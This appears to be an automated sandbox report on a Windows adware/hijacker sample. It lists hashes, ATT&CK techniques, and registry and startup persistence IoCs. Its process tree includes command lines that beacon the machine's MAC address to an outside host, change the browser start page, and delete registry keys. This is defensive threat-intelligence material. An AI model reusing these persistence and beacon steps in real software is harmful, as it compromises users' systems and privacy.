d6987124b3688bf43b82c9a28a28f0322f28e4256c323cb296ff8c55e6cec800

Analysis

max time kernel
149s
max time network
127s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-09-2024 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Size

192KB
MD5

0135ed6e8402bfffca7678ccb611c700
SHA1

e65fe4fe86c6ca570efeae42aced0c88d5ba8b56
SHA256

d6987124b3688bf43b82c9a28a28f0322f28e4256c323cb296ff8c55e6cec800
SHA512

1ec530d31bb96cf2390413c6a2cacb5e102fc2e54c5d8a895533b0e7382dd72f71a8e244f4597ced243dc1deddf5c5bf37aaa1c6d3b3c03207fb4c152e8bed78
SSDEEP

3072:z/na6WDmrZ5Cn79xvlr2xmOJ5wUuWXcfb0hw7IACb873684yVcx566/znEV/IEeC:z/nuDm9knmhJ4/sMLuO6/zGeEf

Score

7^/10

discovery persistence

Malware Config

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ÓÃÓÚÏµÍ³µÇÂ¼µÄÎÄ¼þ£¬É¾³ýµôÎÞ·¨Õý³£µÇÂ¼ÏµÍ³¡£ = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F36C4A31-7F23-11EF-A17D-4A174794FC88} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30d7adca3013db01	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d793ad506ece624c80bd99362738d90700000000020000000000106600000001000020000000ef368e53db39a1713b1ffb2f49960f95ff5433582c0041613871f58d70b8caf4000000000e800000000200002000000021789a456721d1cae879dc40c13b83269677eea7451d85cf794d43f5e02c0e0820000000eab3ee8b6bea6a2cab4c645eaf5b1126e8e638ded14dc3203286dae762d0329440000000d1f588e09a1994a423b0f258065159e6efd6d3e5cc0de5acfd1a30d05dde6388317ef881fc9b12bf8eb16197a32dc0a9d44141f04276e6b7ee4c667bf10fd998	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d793ad506ece624c80bd99362738d9070000000002000000000010660000000100002000000043abf5bc8ea1254af5fbd73921e4e71b3c5e8a241605b51efb0f7eae7cbfb6eb000000000e800000000200002000000077013edd38985f6df9d8235d75b2d0b93683ae6a07e5ad17bf6e45e02f1b5fed9000000083d716741f1c3e4a204a8fb8897626406c1c4c9615b7c6bea834bd5cf8631c516da863eb0c0cc4e024a1fecb20794e86d42ff8cb147cc21f46ad2c26219c79709dc4159d8b054288376db695347d50129065179623bb1cac43da698b5d516a8f9ff62452554a5045a3c9a8f1e7fba729ba7e3b1fc6960a6e2ed6296f84bef650223f6c243508baeef5c89c136a8cf6a8400000000fcb91d512f8596848876f90db511aae97ce9cf4970fa7c7b3dfeb6b0ed20bdf0a3a75d620bce439592192def50dff8ffa5fbe867dbe3caf2d486b80549e5ab2	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "433859652"	IEXPLORE.EXE

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.7400.net"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe

Modifies registry class 41 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\shellex\MayChangeDefaultMenu\	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\InProcServer32\ThreadingModel = "Apartment"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\InitPropertyBag\method = "ShellExecute"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\IE	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\InProcServer32	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\InitPropertyBag\command = "´ò¿ªÖ÷Ò³"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\ieframe	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\InitPropertyBag\Param1 = "http://%77%77%77%2e%37%34%30%30%2e%6e%65%74"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\shellex	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\InitPropertyBag	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\InitPropertyBag\Param2 = "%ProgramFiles(x86)%\\Internet Explorer\\iexplore.exe"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\IE	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\InProcServer32\ = "%SystemRoot%\\SysWow64\\shdocvw.dll"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\shellex\MayChangeDefaultMenu	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\CLSID = "{3f454f0e-42ae-4d7c-8ea3-328250d6e272}"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33170621-7380-2313-3317-738000321388}\Instance\InitPropertyBag\CLSID = "{13709620-C279-11CE-A49E-444553540000}"	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\IE	regini.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"%ProgramFiles(x86)%\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046}	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2068	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2068	IEXPLORE.EXE
2068	IEXPLORE.EXE
2604	IEXPLORE.EXE
2604	IEXPLORE.EXE
2604	IEXPLORE.EXE
2604	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2636 wrote to memory of 2732	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	31
PID 2636 wrote to memory of 2732	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	31
PID 2636 wrote to memory of 2732	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	31
PID 2636 wrote to memory of 2732	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	31
PID 2732 wrote to memory of 2068	2732	iexplore.exe	32
PID 2732 wrote to memory of 2068	2732	iexplore.exe	32
PID 2732 wrote to memory of 2068	2732	iexplore.exe	32
PID 2732 wrote to memory of 2068	2732	iexplore.exe	32
PID 2636 wrote to memory of 2968	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	33
PID 2636 wrote to memory of 2968	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	33
PID 2636 wrote to memory of 2968	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	33
PID 2636 wrote to memory of 2968	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	33
PID 2968 wrote to memory of 2772	2968	cmd.exe	35
PID 2968 wrote to memory of 2772	2968	cmd.exe	35
PID 2968 wrote to memory of 2772	2968	cmd.exe	35
PID 2968 wrote to memory of 2772	2968	cmd.exe	35
PID 2636 wrote to memory of 2668	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	36
PID 2636 wrote to memory of 2668	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	36
PID 2636 wrote to memory of 2668	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	36
PID 2636 wrote to memory of 2668	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	36
PID 2668 wrote to memory of 2532	2668	cmd.exe	38
PID 2668 wrote to memory of 2532	2668	cmd.exe	38
PID 2668 wrote to memory of 2532	2668	cmd.exe	38
PID 2668 wrote to memory of 2532	2668	cmd.exe	38
PID 2068 wrote to memory of 2604	2068	IEXPLORE.EXE	40
PID 2068 wrote to memory of 2604	2068	IEXPLORE.EXE	40
PID 2068 wrote to memory of 2604	2068	IEXPLORE.EXE	40
PID 2068 wrote to memory of 2604	2068	IEXPLORE.EXE	40
PID 2636 wrote to memory of 2572	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	41
PID 2636 wrote to memory of 2572	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	41
PID 2636 wrote to memory of 2572	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	41
PID 2636 wrote to memory of 2572	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	41
PID 2572 wrote to memory of 2628	2572	cmd.exe	43
PID 2572 wrote to memory of 2628	2572	cmd.exe	43
PID 2572 wrote to memory of 2628	2572	cmd.exe	43
PID 2572 wrote to memory of 2628	2572	cmd.exe	43
PID 2636 wrote to memory of 2128	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	44
PID 2636 wrote to memory of 2128	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	44
PID 2636 wrote to memory of 2128	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	44
PID 2636 wrote to memory of 2128	2636	0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe	44
PID 2128 wrote to memory of 444	2128	cmd.exe	46
PID 2128 wrote to memory of 444	2128	cmd.exe	46
PID 2128 wrote to memory of 444	2128	cmd.exe	46
PID 2128 wrote to memory of 444	2128	cmd.exe	46

C:\Users\Admin\AppData\Local\Temp\0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:2636
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://down.biso.cc/b/tj.asp?mac=4A:17:47:94:FC:88&tid=0135ed6e8402bfffca7678ccb611c700_JaffaCakes118
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://down.biso.cc/b/tj.asp?mac=4A:17:47:94:FC:88&tid=0135ed6e8402bfffca7678ccb611c700_JaffaCakes118
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2068 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2604
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\498997_s.ini
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Users\Admin\AppData\Local\Temp\498997_s.ini
    3⤵
    - Modifies registry class
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\498997.ini
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Users\Admin\AppData\Local\Temp\498997.ini
    3⤵
    - Modifies registry class
    PID:2628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9fe819653f18797c8be8eb243e66abaa

SHA1
648874dcaf17e78e0568eaca953bc9e611658b6a

SHA256
8574b8acf5df558919697bb6192adb8d3c3c08467e21798b69488c7e2a482912

SHA512
30162cfc440bb1a4bff77349c7e46c8a2875a1a56f90e42d80a20e7b3ccfaae5ecda45d5f54bf15635c0953f102c545f5fa64412e25e1b3ad04d318e38aa700c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
72408072042866e74ea05eded5804a2a

SHA1
372654853077a1c22f968dde7b0e71dc43bae705

SHA256
9108c6e5ba873af0ca62f4744b7f789aef1d1068ed1b4694272c19fd3ba946be

SHA512
b7ae94fab9ad0733aa749d017d7679aa3476c43f31242ae179fc3f638998b619debd14a6d9c6765cc40ab8ca99b766d36f75c55f4099925588a5202a095685b1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
67a7a0071d34f2ab996e5e5dd391b018

SHA1
41fb060ab213b7484a4e9eca3dbce13799b6218b

SHA256
549ca2f0d8c11e2877a29b431a7cba409663b4005aab831692e93e3852204b7c

SHA512
aa24a37c7bd4c1dadba19a49ae6e47e3287b6d03687d0b6e5f04f669eb2b343656074da3c1700fce9426a8158011bf56c88fdc4f3ad266c356d46473bdf47045

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
64bbe724657a273542aeeecd11a17b74

SHA1
ce56d0394258f49cae6322bf8d1d892d1b6baf53

SHA256
